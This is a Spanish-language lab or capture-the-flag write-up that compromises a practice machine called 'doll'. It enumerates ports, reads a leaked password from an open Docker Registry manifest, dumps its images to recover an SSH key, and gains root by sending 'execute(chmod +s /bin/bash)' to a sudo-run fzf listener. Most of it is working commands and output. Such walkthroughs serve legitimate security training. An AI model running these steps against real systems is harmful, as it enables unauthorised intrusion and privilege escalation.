Enumeramos puertos:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.42
❯ nmap -sCV -p22,1007 -oN 02-targeted.txt 192.168.1.42
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-12 21:51 -03
Nmap scan report for 192.168.1.42
Host is up (0.00026s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 d7:32:ac:40:4b:a8:41:66:d3:d8:11:49:6c:ed:ed:4b (RSA)
| 256 81:0e:67:f8:c3:d2:50:1e:4d:09:2a:58:11:c8:d4:95 (ECDSA)
|_ 256 0d:c3:7c:54:0b:9d:31:32:f2:d9:09:d3:ed:ed:93:cd (ED25519)
1007/tcp open http Docker Registry (API: 2.0)
|_http-title: Site doesn't have a title.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.56 secondsEl puerto 1007 es un Docker Registry (API 2.0) con configuración por defecto. Listamos los repositorios con curl:
❯ curl http://192.168.1.42:1007/v2/_catalog
{"repositories":["dolly"]}Cargamos el manifest del repositorio dolly, que filtra una contraseña:
❯ curl http://192.168.1.42:1007/v2/dolly/manifests/latest
...
passwd=devilcollectsit
...Volcamos todas las imágenes con DRG (DockerRegistryGrabber):
❯ python ~/Documentos/git-clones/DockerRegistryGrabber/drg.py http://192.168.1.42 -p 1007 --dump_all
[+] dolly
[+] BlobSum found 4
[+] Dumping dolly
[+] Downloading : 5f8746267271592fd43ed8a2c03cee11a14f28793f79c0fc4ef8066dac02e017
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : f56be85fc22e46face30e2c3de3f7fe7c15f8fd7c4e5add29d7f64b87abdaa09Al extraer la imagen encontramos una id_rsa del usuario bela. La clave pide passphrase, para la que usamos la contraseña del manifest:
❯ ssh bela@192.168.1.42 -i id_rsa
Enter passphrase for key 'id_rsa':
Linux doll 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-21) x86_64
...
Last login: Tue Apr 25 10:35:13 2023 from 192.168.0.100
bela@doll:~$Obtenemos la primera flag. Para escalar, revisamos sudo -l:
bela@doll:~$ sudo -l
Matching Defaults entries for bela on doll:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User bela may run the following commands on doll:
(ALL) NOPASSWD: /usr/bin/fzf --listen\=1337fzf con --listen recibe instrucciones por HTTP, pero el puerto 1337 solo es accesible localmente, así que hacemos un local port forwarding:
❯ ssh bela@192.168.1.42 -i id_rsa -L 1337:127.0.0.1:1337
bela@doll:~$ sudo fzf --listen\=1337Con el binario corriendo como root, le enviamos un execute para dar SUID a Bash:
❯ curl -X POST 127.0.0.1:1337 -d 'execute(chmod +s /bin/bash)'
bela@doll:~$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1234376 mar 27 2022 /bin/bashY lanzamos una shell privilegiada:
bela@doll:~$ bash -p
bash-5.1# whoami
rootObtenemos nuestra flag.
Fin.